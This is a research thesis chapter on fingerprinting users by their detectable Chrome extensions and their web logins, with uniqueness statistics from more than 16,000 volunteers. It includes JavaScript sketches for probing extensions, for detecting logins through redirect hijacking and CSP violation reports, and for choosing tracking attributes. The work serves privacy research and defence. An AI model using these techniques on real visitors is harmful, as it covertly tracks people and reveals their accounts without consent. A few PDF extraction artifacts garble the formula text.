Researchers have shown that a user's browser has a number of "physical" characteristics
that can be used to uniquely identify it and hence to track it across the Web.
Fingerprinting of users' devices is thus similar to physical biometric traits of people, where only
physical characteristics are studied.
Similar to previous demonstrations of user uniqueness based on behavior [166, 231],
behavioral characteristics, such as browser settings and the way people use their
browsers, can also help to uniquely identify Web users. For example, a user installs the web
browser extensions she prefers, such as AdBlock [6], LastPass [86] or Ghostery [61], to
enrich her Web experience. Also, while browsing the Web, she logs into her favorite social
networks, such as Gmail [66], Facebook [53] or LinkedIn [90]. In this work, we study users'
uniqueness based on their behavior and preferences on the Web: we analyze how unique
Web users are based on their browser extensions and logins.
In recent works, Sjösten et al. [249] and Starov and Nikiforakis [260] explored two complementary
techniques to detect extensions. Sánchez-Rola et al. [245] then discovered
how to detect any extension via a timing side channel attack. These works were focused
on the technical mechanisms to detect extensions, but what was not studied is
how browser extensions contribute to the uniqueness of users at a large scale.
Linus [223] showed that some social websites are vulnerable to the "login-leak" attack, which
allows an arbitrary script to detect whether a user is logged into a vulnerable website. However,
it was not studied whether Web logins can also contribute to users' uniqueness.
In this work, we performed the first large-scale study of user uniqueness based on browser
extensions and Web logins, collected from more than 16,000 users who visited our website
(see the breakdown in Fig. 7.6). Our experimental website identifies installed Google
Chrome [62] extensions via Web Accessible Resources [249], and detects the websites the
user is logged into by methods that rely on URL redirection and CSP violation reports.
Our website is able to detect the presence of 13k Chrome extensions on average per month
(the number of detected extensions varied monthly between 12,164 and 13,931), covering
approximately 28% of all free Chrome extensions 1. We also detect whether the user is
connected to one or more of 60 different websites. Our main contributions are:
— A large scale study on how unique users are based on their browser extensions
and website logins. We discovered that 54.86% of users that have installed at least
one detectable extension are unique; 19.53% of users are unique among those who
have logged into one or more detectable websites; and 89.23% are unique among users
with at least one extension and one login. Moreover, we discover that 22.98% of users
could be uniquely identified by Web logins, even if they disable JavaScript.
— We study the privacy dilemma of Adblock and privacy extensions, that is, how well
these extensions protect their users against trackers and how much they also
contribute to uniqueness. We evaluate the statement "the more privacy extensions
you install, the more unique you are" by analyzing how users' uniqueness increases
with the number of privacy extensions they install, and by evaluating the
tradeoff between the privacy gain of blocking extensions such as Ghostery [61]
and Privacy Badger [117] and their contribution to uniqueness.
We furthermore show that browser extensions and Web logins can be exploited to finger-
print and track users by only checking a limited number of extensions and Web logins.
We have applied an advanced fingerprinting algorithm [197] that carefully selects a limited
number of extensions and logins. For example, Figure 7.1 shows the uniqueness of users
we achieve by testing a limited number of extensions. The last column shows that 54.86%
of users are unique based on all 16,743 detectable extensions. However, by testing 485
carefully chosen extensions we can identify more than 53.96% of users. Besides, detecting
485 extensions takes only 625ms.
Finally, we give suggestions to end users, website owners, and browser vendors
on how to protect users from fingerprinting based on extensions and logins.
In our study, we did not have enough data to make any claims about the stability of
browser extensions and web logins, because only a few users repeated the experiment on our
website (to be precise, only 66 users out of 16,393 made more than 4 tests on
our website). We leave this as future work.
1. The list of detected extensions and websites is available on our website: https://extensions.inrialpes.fr/faq.php
Figure 7.1 – Results of general fingerprinting algorithm. Testing 485 carefully selected
extensions provides a very similar uniqueness result to testing all 16,743 extensions. Almost
unique means that there are 2–5 users with the same fingerprint.
2 Background
2.1 Detection of browser extensions
In the Google Chrome web browser, each extension comes with a manifest file [64],
which contains metadata about the extension. Each extension has a unique and per-
manent identifier, and the manifest file of an extension with identifier extID is located
at chrome-extension://[extID]/manifest.json. The manifest file has a section called
web_accessible_resources (WARs) that declares which resources of an extension are ac-
cessible in the content of any webpage [63]. The WARs section specifies a list of paths to
such resources, presented by the following type of URL:
chrome-extension://[extID]/[path], where path is the path to the resource in the ex-
tension.
Therefore, a script that tries to load such an accessible resource in the context of an
arbitrary webpage is able to check whether an extension is installed with a 100% guarantee:
if the resource is loaded, an extension is installed, otherwise it is not. Figure 7.2 shows
an example of AdBlock extension detection: the script tries to load an image, which is
declared in the web_accessible_resources section of AdBlock’s manifest file. If the
image from AdBlock, located at chrome-extension://[AdBlockID]/icons/icons24.png
is successfully loaded, then AdBlock is installed in the user’s browser.
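The detection itself can be performed with a few lines of JavaScript. The sketch below probes one extension through an image resource; the identifier and resource path are placeholders (the real probes use the identifiers and the paths declared in each extension's manifest, as in the AdBlock example above), and non-image resources can be probed in a similar way.

// Sketch of WAR-based extension detection (extId and path are placeholders).
function detectExtension(extId, path) {
  return new Promise(function (resolve) {
    var img = new Image();
    img.onload = function () { resolve(true); };   // resource loaded: extension installed
    img.onerror = function () { resolve(false); }; // resource not found: not installed
    img.src = "chrome-extension://" + extId + "/" + path;
  });
}

// Example probe, following the AdBlock icon example above.
detectExtension("[AdBlockID]", "icons/icons24.png").then(function (installed) {
  console.log("AdBlock installed:", installed);
});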
Sjösten et al. [249] were the first to crawl the Google Chrome Web Store and to discover
that 28% of all free Chrome extensions are detectable by WARs. An alternative method to
detect extensions that was available at the beginning of our experiment was a behavioral
method from XHOUND [260], but it had a number of false positives and detected only 9.2%
of the top 10k extensions. Therefore, we decided to reuse the code from Sjösten et al. [249],
with their permission, to crawl the Chrome Web Store and identify detectable extensions based
on WARs.
Figure 7.2 – Detection of browser extensions and Web logins. A user visits a benign
website test.com which embeds third party code (the attacker's script) from attacker.com.
The script detects an icon of the AdBlock extension and concludes that AdBlock is installed.
Then the script detects that the user is logged into Facebook when it successfully loads
Facebook's favicon.ico. It also detects that the user is logged into LinkedIn through a
CSP violation report triggered by a redirection from https://fr.linkedin.com
to https://www.linkedin.com. All detections of extensions and logins are invisible to
the user.
During our experiment, we discovered that WARs could also be detected in other
Chromium-based browsers like Opera [109] and the Brave Browser [16] (we could even
detect the Brave Browser itself, since it ships with several default extensions detectable by
WARs). We have chosen to work with Chrome, as it was the most affected.
2.2 Detection of web logins
In general, a website cannot detect whether a user is logged into other websites because of
Web browser security mechanisms, such as access control and Same-Origin Policy [125]. In
this section, we present two advanced methods that, despite browser security mechanisms,
allow an attacker to detect the websites the user is logged into. Figure 7.2 presents
all the detection mechanisms.
Redirection URL hijacking. The first requirement for this method to work is the login
redirection mechanism: when a user is not logged into Facebook, and tries to access an
internal Facebook resource, she automatically gets redirected to the URL http://www.
facebook.com/login.php?next=[path], where path is the path to the resource. The
second requirement is that the website should have an internal image available to all the
users. In the case of Facebook, it is a favicon.ico image.
By dynamically embedding an image pointing to https://www.facebook.com/login.php?
next=https%3A%2F%2Fwww.facebook.com%2Ffavicon.ico into the webpage, an attacker
can detect whether the user is logged into Facebook or not. If the image loads, then
the user is logged into Facebook, otherwise she is not. This method has been shown to
successfully detect logins on dozens of websites [223].
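The sketch below illustrates this technique with the Facebook example described above; the same image-probing pattern applies to other vulnerable websites.

// Sketch of login detection through redirection URL hijacking (Facebook example).
function detectFacebookLogin() {
  return new Promise(function (resolve) {
    var img = new Image();
    img.onload = function () { resolve(true); };   // redirected to favicon.ico: logged in
    img.onerror = function () { resolve(false); }; // login page returned instead: not logged in
    img.src = "https://www.facebook.com/login.php?next=" +
              encodeURIComponent("https://www.facebook.com/favicon.ico");
  });
}

detectFacebookLogin().then(function (loggedIn) {
  console.log("Logged into Facebook:", loggedIn);
});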
Abusing CSP violation reporting. An attacker can misuse CSP to detect redirections [206]. We extend this idea to detect
logins. For this method to work, a website should redirect its logged-in users to a different
domain. In the case of LinkedIn, users who are not logged in visit fr.linkedin.com,
while users who are logged in are automatically redirected to a different domain,
www.linkedin.com. The lowest block of Fig. 7.2 presents an example of such an attack on
LinkedIn. Initially, the attacker embeds a hidden iframe from his own domain with a CSP
that restricts loading images only from fr.linkedin.com. Then, the attacker dynamically
embeds a new image on the testing website, pointing to fr.linkedin.com. If the user is
logged in, LinkedIn will redirect her to www.linkedin.com, and thus the browser will
fire a CSP violation report, because images can be loaded only from fr.linkedin.com. By
receiving the CSP report, the attacker deduces that the user is logged into LinkedIn.
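The following sketch illustrates the LinkedIn example. It shows the content of the hidden iframe served from the attacker's domain; the CSP shown in the comment would be delivered as a response header with this document, and /csp-report is a hypothetical endpoint where the attacker collects violation reports.

<!-- Served from the attacker's domain with the response header (assumed):
     Content-Security-Policy: img-src fr.linkedin.com; report-uri /csp-report -->
<script>
  // Probe an image from fr.linkedin.com. If the user is logged in, LinkedIn redirects
  // the request to www.linkedin.com, the CSP blocks it, and the browser sends a
  // violation report to /csp-report, revealing the login to the attacker.
  var probe = new Image();
  probe.src = "https://fr.linkedin.com/";
</script>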
3 Dataset
We launched an experiment website in April 2017 to collect browser extensions and Web
logins with the goal of studying users’ uniqueness at a large scale. We have advertised our
experiment by all possible means, including social media and the press. In this section, we
first present the set of attributes that we collect in our experiment and the rules we applied
to filter out irrelevant records. Then, we provide data statistics and show which extensions
and logins are popular among our users.
3.1 Experiment website and data collection
The goal of our website is both to collect browser extensions and Web logins, and to inform
users about privacy implications of this particular type of fingerprinting. Using the various
detection techniques described in Section 2, we collect the following attributes:
— The list of installed browser extensions, using web accessible resources. For each user
we tested around 13k extensions detectable at the moment of testing (see Figure 7.3).
— The list of Web logins: we test for 44 logins using redirection URL hijacking and 16
logins using CSP violation report.
— Standard fingerprinting attributes [221], such as fonts installed, Canvas fingerprint [164],
and WebGL [227]. To collect these attributes, we use FingerprintJS2, which is an
open-source browser fingerprinting library [199]. We collected these attributes in
order to clean our data and compare entropy with other studies (see Table 7.3).
To recognize users that perform several tests on our website, we have stored a unique
identifier for each user in the HTML5 localStorage. We advertised our website on forums
and social media channels related to science and technology, and got press
coverage in 3 newspapers. We have collected 22,904 experiments performed by 19,814
users between April and August 2017.
Ethical concerns. Our study was validated by an IRB-equivalent service at our institu-
tion. All visitors are informed of our goal, and are provided with both Privacy Policy and
FAQ sections of the website. The visitors have to explicitly click on a button to trigger the
collection of their browser attributes. In our Privacy Policy, we explain what data we are
collecting, and give users the possibility to opt out of our experiment. The data collected is used
only for our own research, will be held until December 2019 and will not be shared with
anyone.
Data cleaning. We applied a set of cleaning rules over our initial data, to improve
the quality of the data. The final dataset contains 16,393 valid experiments (one per
user). Table 7.1 shows the initial number of users and which users have been removed
from our initial dataset. We have removed all 1,042 users with mobile browsers. At the
time of writing this thesis, browser extensions were not supported on Chrome for mobiles.
Initial users                                                             19,814
Mobile browser users                                                       1,042
Chrome browser users with extension detection error                            6
Non Chrome users with at least one extension detected                        261
Brave browser users                                                           31
Users whose browser has an empty user-agent string, screen
resolution, fonts, or canvas fingerprint                                    2,015
Users with more than 4 experiments                                             66
Final dataset                                                              16,393
Chrome browser users in the final dataset                                   7,643

Table 7.1 – Users filtered out of the final dataset
Since extension detection was designed for Chrome, we excluded mobile browsers.
Moreover, mobile users tend to prefer native apps to their web versions 2. In fact,
the popular logins in our dataset, such as Gmail, Facebook, and Youtube, all have a native
mobile version.
We have also removed 2,015 users that have deliberately tampered with their browsers:
for example, users with empty user-agent string, empty screen resolution or canvas finger-
print. We think that it is reasonable not to trust information received from those users, as
they may have tampered with it. We also needed this information to compare our study
with previous works on browser fingerprinting. Finally, we have excluded users who have
tampered with extension detection. This includes Chrome users for whom extension de-
tection did not successfully complete, and users of other browsers with at least 1 extension
detected.
For users who visited our website and performed up to 4 experiments, we kept only one
experiment, the one with the largest number of extensions and logins. We then removed the 66
users with more than 4 experiments. We suspect that the goal of such users with numerous
experiments was simply to use our website to test the uniqueness of their browsers
with different browser settings.
Figure 7.3 – Evolution of detected extensions in Chrome
2. https://jmango360.com/wiki/mobile-app-vs-mobile-website-statistics/
Evolution of browser extensions. From November 2016 to July 2017, we crawled on
a monthly basis the free extensions on the Chrome Web Store in order to keep an up-to-
date set of extensions for our experiment. Figure 7.3 presents the evolution of extensions
throughout the period of our experiment. Since some extensions got removed from the
Chrome Web Store, the number of stable extensions decreased.
Out of 12,164 extensions that were detectable in November 2016, 8,810 extensions (72.4%)
remained stable throughout the 9-months-long experiment. In total, 16,743 extensions were
detected at some point during these 9 months. Since every month the number of detectable
extensions was different, on average we have tested around 13k extensions during each
month.
3.2 Data statistics
Our study is the first to analyze uniqueness of users based on their browser extensions
and logins at large scale. Only uniqueness based on browser extensions was previously
measured, but on very small datasets of 204 [245] and 854 [260] participants. We measure
uniqueness of 16,393 users for all attributes, and of 7,643 Chrome browser users for browser
extensions.
Comparison to previous studies. To compare our findings with the previous works
on browser extensions, we randomly pick subsets of 204 (as in [245]) and 854 (as in [260])
Chrome users 100 times (we found that picking 100 times provided a stable result). Ta-
ble 7.2 shows uniqueness results from previous works and an estimated uniqueness using
our dataset.
Table 7.2 – Previous studies on measuring uniqueness based on browser extensions and our
estimation of uniqueness.

Study               Fingerprints collected   Extensions targeted   Unique fingerprints   Unique fingerprints
                    in a study               in a study            in a study            in our dataset
Timing leaks [245]  204                      2,000                 56.86%                55.64%
XHOUND [260]        854                      1,656                 14.10%                49.60%
Ours                7,643                    13k                   39.29%                39.29%
The last column in Table 7.2 shows our evaluation of uniqueness for a given subset of
users. Our estimation for 204 random users is 55.64%, which is close to the 56.86% of
the original study [245]. For 854 random users, we estimate that 49.60% of them are
unique, while in the original XHOUND study [260] the percentage of unique users is only
14.1%. We think that such a small percentage of unique users in [260] is due to (1) a smaller
number of extensions detected (only 174 extensions were detected for the 854 users); and (2) a
different user base: while our experiment and [245] targeted colleagues, students, and
other likely privacy-aware experts, XHOUND [260] used Amazon Mechanical Turk, where
users probably have different habits of installing extensions. Out of the 7,643 Chrome
users for whom we detected extensions, 39.29% were unique. This number
is a more realistic estimation of users' uniqueness based on browser extensions than
previous works because of a significantly larger dataset.
To the best of our knowledge, our study is the first to analyze uniqueness of users
based on their web logins, and on combination of extensions and logins.
Normalized Shannon’s entropy. We compare our dataset with the previous studies
on browser fingerprinting: AmIUnique [218, Table B.3] (contains 390,410 fingerprints, col-
lected between November 2014 and June 2017) and Hiding in the Crowd [191] (contains
1,816,776 users collected in 2017). Entropy measures the amount of identifying information
in a fingerprint – the higher the entropy is, the more unique and identifiable a fingerprint
will be. To compare with previous datasets, which are of different sizes, we compute
normalized Shannon’s entropy:
HN(X) = H(X)
log2N=1
log2N·X
i
P(xi) log2P(xi)(7.1)
where Xis a discrete random variable with possible values {x1, ..., xn},P(X)is a proba-
bility mass function and Nis the size of the dataset.
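As a concrete illustration, the short function below computes the normalized entropy of Equation (7.1) from a list of fingerprint values (one value per user). It is only an illustration of the formula, not the analysis code we used.

// Sketch of the normalized Shannon entropy of Equation (7.1).
function normalizedEntropy(fingerprints) {
  var N = fingerprints.length;
  var counts = new Map();
  fingerprints.forEach(function (f) { counts.set(f, (counts.get(f) || 0) + 1); });

  var H = 0;
  counts.forEach(function (c) {
    var p = c / N;                      // P(x_i): empirical probability of this fingerprint
    H -= p * Math.log2(p);              // H(X) = -sum_i P(x_i) log2 P(x_i)
  });
  return H / Math.log2(N);              // H_N(X) = H(X) / log2(N)
}

// Example: three users share a fingerprint, one user is unique.
console.log(normalizedEntropy(["a", "a", "a", "b"]));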
Table 7.3 compares the entropy values of well-known attributes for standard fingerprinting
and for logins for all 16,393 users in our dataset and for browser extensions for 7,643 Chrome
users. All the attributes in standard fingerprinting are similar to previous works, except
for fonts and plugins. Unsurprisingly, plugins entropy is very small because of decreasing
support of plugins in Firefox [237] and Chrome [246]. Differently from previous studies
that detected fonts with Flash, we used JavaScript based font detection, relying on a list
of 500 fonts shipped along with the FingerprintJS2 library. As those fonts are selected for
fingerprinting, this could explain why our list of fonts provides a very high entropy.
Table 7.3 – Normalized entropy of extensions and logins compared to previous studies.

Standard fingerprinting studies
Attribute           Ours    AmIUnique [218]   Hiding [191]
Desktop
User Agent          0.474   0.601             0.304
List of Plugins     0.343   0.523             0.494
Timezone            0.168   0.187             0.005
Screen Resolution   0.271   0.276             0.213
List of Fonts       0.652   0.370             0.335
Canvas              0.611   0.503             0.387

Studies on extensions and logins
Attribute    Ours    Timing leaks [245]   XHOUND [260]
Extensions   0.641   0.869                0.437
Logins       0.441   N/A                  N/A
In our dataset, as well as in previous studies, browser extensions are one of the most discriminating
attributes of a user's browser. The entropy of 0.641, computed for the
7,643 Chrome users, lies between the findings of Timing leaks [245] and XHOUND [260].
One possible explanation is the size of the user base. For instance, users in XHOUND had
few, and probably often the same, extensions detected (out of 1,656 targeted extensions,
only 174 were detected for 854 users), making only 14.1% of them unique; this explains
why the entropy in XHOUND is smaller. Sánchez-Rola et al. [245] computed a very high
entropy, but on a very small dataset of 204 users: 116 of them had a unique set of installed
extensions, and thus the computed entropy was very high.
Figure 7.4 – Usage of browser extensions and logins by all users.
3.3 Usage of extensions and logins
Figure 7.4 shows the distribution of users in our dataset according to the number of detected
extensions and logins (users having between 1 and 13 logins or extensions detected), and the
number of unique users as they are grouped by number of detected extensions and logins.
The maximum number of extensions we detected for a single user was 33. The number
of users decreases with the number of extensions. The largest group of users has only 1
extension detected, followed by users with 2 detected extensions, etc. We notice that the
more extensions a user has, the more unique she is. We analyze this phenomenon further
in Section 4.2. Among users with exactly 1 extension detected, 7.39% are unique. This
percentage rises to 45.35% and 85.89% for groups of users with exactly 2 and 3 detected
extensions respectively.
Figure 7.4 also shows the distribution of users per number of detected logins. We found that
most users have between 1 and 10 logins, with a maximum number of 40 logins detected
for one user. On our website, we were able to detect the presence of 60 logins, which is
rather small with respect to the large number of extensions we tested (around 13k per
user). This explains why fewer users are unique based on their logins: for example, among
users with exactly 1 login detected, 0.10% are unique, and 7.82% are unique among users
with exactly 2 logins detected.
Table 7.4 – Top seven most popular extensions in our dataset and their popularity on
the Chrome Web Store

Extension Dataset Chrome Web Store
AdBlock 1,557 10,000,000+
LastPass: Free Password Manager 1,081 7,297,730
Ghostery 735 2,665,427
Privacy Badger 594 771,804
Adobe Acrobat 585 10,000,000+
Cisco WebEx Extension 482 10,000,000+
Save to Pocket 428 2,752,642
What extensions are the most popular among our users? Table 7.4 presents
the seven most detected extensions in our dataset of 16,393 users. The three most popular
are AdBlock [6], the password manager LastPass [86] and the tracker blocker
Ghostery [61]. These extensions are also very popular according to their download statistics
on the Chrome Web Store.
What websites do users log into the most? Table 7.5 shows the seven most
detected websites in our experiment. These websites are also highly ranked according to
Alexa 3: for instance, Google [65], Facebook [53] and Youtube [157] are regularly ranked
as the top 3 most popular websites by Alexa 4.
Table 7.5 – Top seven most popular logins in our dataset and their ranking according to
Alexa
Website Dataset Alexa Rank
Gmail (subdomain of Google) 6,828 1
Youtube 6,780 2
Facebook 5,493 3
LinkedIn 3,913 13
Blogger 3,393 53
Twitter 3,274 8
eBay.com 2,220 33
Being able to detect such popular websites further strengthens our study, as they represent websites that are widely used in the wild.
4 Uniqueness analysis
In this section we present the results for users' uniqueness based on all 16,743 extensions
and 60 logins. We first show uniqueness for the full dataset of 16,393 users, and then
present more specific results for various subsets of our dataset.
Figure 7.5 – Distribution of anonymity set sizes for 16,393 users based on detected exten-
sions and logins.
Uniqueness results for the full dataset. Figure 7.5 shows the uniqueness of users
according to their extensions and logins, and a combination of both attributes. Out of the
16,393 users, 11.30% are unique based on their logins. For 42.1% of users in our dataset,
we did not detect any logins. These users either did not log into any of the 60 websites
we could detect or blocked third party cookies, that prevented our login detection from
working properly.
Considering only detected extensions, 18.38% of users in our dataset are unique. This
result is also influenced by the 66.61% of users who did not have any extension detected:
these are either Chrome users with no extensions detected, or users of other browsers.
An attacker willing to fingerprint users can also use their detected logins and extensions
combined. Interestingly, by combining extensions and logins, we found that 34.51% of users
3. Alexa ranking extracted on the 28th of June 2018
4. Note that Gmail is a subdomain of Google, that is why it is ranked 1 in Table 7.5.
are uniquely identifiable. It is worth mentioning that 32.61% of users have no extensions
and no logins detected, which significantly impacts the computed uniqueness.
4.1 Four final datasets
Figure 7.6 – Four final datasets. DExt contains users who have installed at least one
detected extension and DLog contains users who have at least one login detected.
In our full dataset of 16,393 users, we have observed 7,643 users of the Chrome browser, for
whom the testing of browser extensions worked properly. In this subsection we consider various
subsets of our full dataset that demonstrate uniqueness results for users who have at least
one extension or one login detected. Figure 7.6 shows the four final datasets that we further
analyze in this section:
— DExt contains 5,474 Chrome users, who have installed at least one extension that we
can detect.
— DLog contains 9,492 users, who have logged into at least one website that we detect.
— DExt ∩ DLog contains 3,919 Chrome users who have at least one extension and one
login detected.
— DExt ∪ DLog contains 11,047 users who have either at least one extension or at least
one login detected.
4.2 Uniqueness results for final datasets
Figure 7.7 presents results for the four datasets. The DExt dataset shows that 54.86% of users
are uniquely identifiable among Chrome users who have at least one detectable extension.
This demonstrates that browser extension detection is a serious privacy threat as a
fingerprinting technique.
Among the 9,492 users with at least one login detected (DLog dataset), only 19.53% are uniquely
identifiable. This result can be explained by the very small diversity of attributes (only 60
websites).
When we analyzed Chrome users who have at least one extension and one login detected
(DExt ∩ DLog dataset), we found that 89.23% of them are uniquely identifiable. This
means that, without any other fingerprinting attributes, the mere installation of at least
one extension, in addition to being logged into at least one website, implies that the majority
of users in this dataset can be tracked by their fingerprint based solely on extensions and
logins!

Figure 7.7 – Anonymity sets for different datasets
Furthermore, for the dataset DExt ∪ DLog, which contains users with at least one extension or at
least one login, we compute that 51.15% of users can be uniquely identified. This result
becomes particularly interesting when we compare the size of the DExt ∪ DLog dataset,
which contains 11,047 users, with the size of the DExt dataset, which has 5,474 users. The
size of DExt ∪ DLog is almost twice that of DExt. Nevertheless, the percentage of unique
users and the distribution of anonymity set sizes in these datasets are very similar: 54.86%
of unique users in DExt and 51.15% in DExt ∪ DLog. We believe this is due
to the fact that extensions and logins are orthogonal properties. We checked the cosine
similarity between these attributes as binary vectors and found that all attribute pairs
had a very low similarity score, all below 0.34, with 11 exceptions below 0.2.
The last row, DExt(Stable), shows the uniqueness of users in the DExt dataset when considering
only stable extensions (see Section 3). Interestingly, 50.35% of users are
uniquely identifiable with their stable extensions only, and the distribution of anonymity
set sizes is very similar too. This result shows that the browser extensions that were added
or removed throughout the 9-months-long experiment do not influence the result of users'
uniqueness.
Figure 7.8 – Anonymity sets for users with respect to the number of detected extensions
The more extensions you install, the more unique you are. In the beginning of
this section, we have shown that 54.86% of users are unique among those who have at least
one extension detected (DExt dataset). Figure 7.8 shows how uniquely identifiable users
are when they have more extensions detected. Among users with at least two extensions
detected, 76.25% are uniquely identifiable. This percentage rises quickly to 92.22% and
95.85% when we consider users with at least three and four extensions detected, respectively.
We made a similar analysis for logins: likewise, the percentage of unique users grows if we
consider users with a higher number of detected logins. 31.58% of users with at least 5 logins
are uniquely identifiable with their logins only; this percentage rises to 38.98% when we
detect at least 8 logins. Intuitively, the more extensions or logins a user has, the more
unique she becomes. It is worth mentioning that the number of users considered decreases
as we increase the number of extensions or logins detected, as shown in Figure 7.4.
Figure 7.9 – Anonymity sets when JavaScript is disabled
Uniqueness if JavaScript is disabled. Users might decide to protect themselves from
fingerprinting by disabling JavaScript in their browsers. However, even when JavaScript is
disabled, the detection of logins via a CSP violation attack still works. Among the 60 websites in
our experiment, we discovered that such an attack works for 18 websites. Figure 7.9 shows
anonymity sets for 9,492 users of DLog dataset assuming users have disabled JavaScript.
By considering only logins detectable with CSP, 1.63% of users are uniquely identifiable,
and 4.10% are unique based on a user agent string that is sent with every request by the
browser. However, when we combine the user agent string with the list of logins detectable
with CSP, 22.98% of users become uniquely identifiable.
5 Fingerprinting attacks
According to the uniqueness analysis from Section 4, 54.86% of users that have installed
at least one detectable extension are unique; 19.53% of users are unique among those who
have logged into one or more detectable websites; and 89.23% are unique among users with
at least one extension and one login. Therefore, extensions and logins can be used to track
users across websites. In this section we present the threat model, discuss and evaluate
two algorithms that optimize fingerprinting based on extensions and logins.
5.1 Threat model
The primary attacker is an entity that wishes to uniquely identify a user’s browser across
websites. The attacker recognizes the user by her browser fingerprint, a unique set of
detected browser extensions and Web logins (we call them attributes), without relying
on cookies or other stateful information. A single JavaScript library that is embedded
on a visited webpage can check what extensions and Web logins are present in the user’s
browser. By doing so, an attacker is able to uniquely identify the user and track her
activities across all websites where the attacker’s code is present. We assume that an
attacker has a dataset of users’ fingerprints, either previously collected by the attacker or
bought from data brokers.
5.2 How to choose optimal attributes?
The most straightforward way to track a user via browser fingerprinting is to check all the
attributes (browser extensions and logins) of her browser. However, testing all 13k extensions
takes around 30 seconds 5 and thus may be unfeasible in practice. Therefore, the
number of tested attributes is one of the most important properties of a fingerprinting attack:
the attack is faster when fewer attributes are checked, but testing fewer attributes may
lead to worse uniqueness results, because more users will share the same fingerprint.
While it was shown that finding the optimal fingerprint is an NP-hard problem [197],
finding approximate solutions is not a trivial task either. For example, choosing the most
popular attributes worked in the case of tracking based on Web history, but this strategy
is not necessarily globally optimal.
Following the theoretical results of Gulyás et al. [197], we consider two strategies:
(1) targeting a specific user, and thus selecting attributes that make her unique with high
probability – called the targeted fingerprinting algorithm; and (2) uniquely identifying a
majority of users in a dataset, and thus selecting the same set of attributes for all users – we
call it the general fingerprinting algorithm. Targeted fingerprinting mainly uses popular
attributes if they are not detectable (e.g., popular extensions are not installed) or unpopular
ones if they are detectable. General fingerprinting instead considers attributes that
are detectable for roughly half of the population (this allows choosing more independent
attributes, which makes a fingerprint based on them more unique).
Using the algorithms developed in [197], we performed experiments with general and targeted
fingerprinting. Our goal is to achieve results close to those in Section 4, but by
testing a smaller number of attributes 6.
5.3 Targeted fingerprinting
Attack outline. The attacker aims to identify a specific user with high probability. In
order to do this, the attacker needs to have information about the targeted user in her
dataset of fingerprints. The attacker generates a fingerprint pattern that consists of
a list of attributes with a known value, such as f_j = [AdBlock = yes, LastPass = No, ...].
Notice that a fingerprint pattern contains not only extensions that the user installed, but
also extensions that are not installed. This information also helps to uniquely identify the
user.
Let us denote the user database as D, with n users and m attributes, each row i corresponding
to user U_i and each column j corresponding to attribute A_j. Let the algorithm target
user U_i. First, we need to find her most distinguishing attribute A_j, shared with the
smallest number of other users; let us denote these users as S_{i,j}. Then we need to find a
second most distinguishing attribute A_k which separates U_i from S_{i,j}. The algorithm
continues searching for the most distinguishing attributes until the given pattern makes
U_i unique (or there are no more acceptable choices left).
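The sketch below gives a greedy version of this idea, assuming that each user is represented as a Set of detected attributes. It is only an illustration in the spirit of the description above; the actual algorithm and implementation are those of Gulyás et al. [196, 197].

// Greedy sketch in the spirit of the targeted fingerprinting algorithm described above.
// users: array of Sets of detected attributes; target: index of the targeted user.
function targetedPattern(users, target, attributes) {
  const pattern = [];                       // e.g. [["AdBlock", true], ["LastPass", false]]
  let candidates = users.filter((_, i) => i !== target); // users not yet separated

  while (candidates.length > 0) {
    let best = null, bestRemaining = Infinity;
    for (const a of attributes) {
      const value = users[target].has(a);
      // Users that share the same value of attribute a with the target.
      const remaining = candidates.filter((u) => u.has(a) === value).length;
      if (remaining < bestRemaining) { bestRemaining = remaining; best = a; }
    }
    if (best === null || bestRemaining === candidates.length) break; // no progress possible
    pattern.push([best, users[target].has(best)]);
    candidates = candidates.filter((u) => u.has(best) === users[target].has(best));
  }
  return pattern;                            // empty candidates means the pattern is unique
}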
Evaluation. We applied the targeted fingerprinting algorithm [197] on our datasets DExt, DLog,
DExt ∩ DLog and DExt ∪ DLog, and computed a fingerprint pattern for each user. Using
these patterns, we computed the anonymity sets for all datasets; they are identical to
those shown in Figure 7.7, so we do not repeat these results in a new figure.
For each unique user, the fingerprint pattern contains a smaller number of attributes than
the number of attributes detected for the user. For example, it is enough to test only
2 extensions for a user who has installed 4 detectable extensions. Figure 7.10 shows the
5. We evaluate performance in Section 6.
6. We reused the implementation of Gulyás et al., who shared their code [196].
distribution of fingerprint pattern sizes of unique users (marked with “targeted”), and com-
pares them to the number of attributes detected for each user. The figure clearly shows
that fingerprint patterns are typically smaller than the number of detected attributes users
have.
For non-unique users, the size of the fingerprint pattern is often bigger than the number of
detected attributes the user has. Let us discuss this on our largest dataset, DExt ∪ DLog,
noting that the other datasets exhibit the same phenomenon. For unique users, on average we
have 7.94 attributes detected, while the average size of the fingerprint pattern is only 3.94
attributes. For non-unique users, the average number of detected attributes is 5.41, while the
average size of the fingerprint pattern grows up to 30.17. This result is not surprising: with less
information it is more difficult to distinguish users, and the fingerprint pattern may also
include negative attributes (i.e., LastPass=No means the extension should not be detected),
which can greatly extend its length.
Figure 7.10 – Comparison of fingerprint pattern size (targeted) and the total number of
detected attributes (detected) for unique users.
The targeted fingerprint is efficient, as it provides almost maximal uniqueness while reducing
the number of attributes. However, it cannot be used for new users, because the
attacker does not have any background knowledge about them. To reach a wider applicability,
with a trade-off in the fingerprint pattern size, we also consider general fingerprinting [197].
5.4 General fingerprinting
Attack outline. The purpose of this algorithm is to provide a short list of attributes,
called fingerprint template. If the attributes in a fingerprint template are tested for a
certain user, she will be uniquely identified with high probability. Similarly to the example
PUT(0,-845.90042)
PUT(0,-845.90042)
134 CHAPTER 7. BROWSER EXTENSIONS FINGERPRINTING
of targeted fingerprinting, we consider the fingerprint template F=[AdBlock, LastPass,
...], that would yield the fingerprint fF
j=[yes, no, . . . ] for the user Uj.
The algorithm first groups all users into a set S. Then it looks for an attribute A_i that
separates S into roughly equally sized subsets S_1 and S_2 when users are grouped by their
value of A_i. In the next round, it looks for another attribute A_j ≠ A_i that splits S_1 and
S_2 further into roughly equally sized sets. This step is repeated until we run out of
applicable attributes or the remaining sets cannot be split further.
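A minimal sketch of this splitting strategy is given below, under the same array-of-attribute-maps representation; it illustrates the idea only and does not reproduce the exact stopping criterion of [197], which is described in the evaluation below.

// Sketch of general fingerprinting: greedily pick attributes that split the
// current anonymity sets into roughly equally sized subsets.
function generalTemplate(users, attributes, maxLen) {
  const template = [];
  let partition = [users];                  // current anonymity sets
  const remaining = new Set(attributes);
  while (template.length < maxLen && remaining.size > 0) {
    let best = null, bestScore = -1;
    for (const a of remaining) {
      // an attribute separating many pairs of users corresponds to balanced splits
      let score = 0;
      for (const set of partition) {
        const yes = set.filter(u => u[a]).length;
        score += yes * (set.length - yes);
      }
      if (score > bestScore) { bestScore = score; best = a; }
    }
    if (bestScore <= 0) break;              // no attribute splits any remaining set
    template.push(best);
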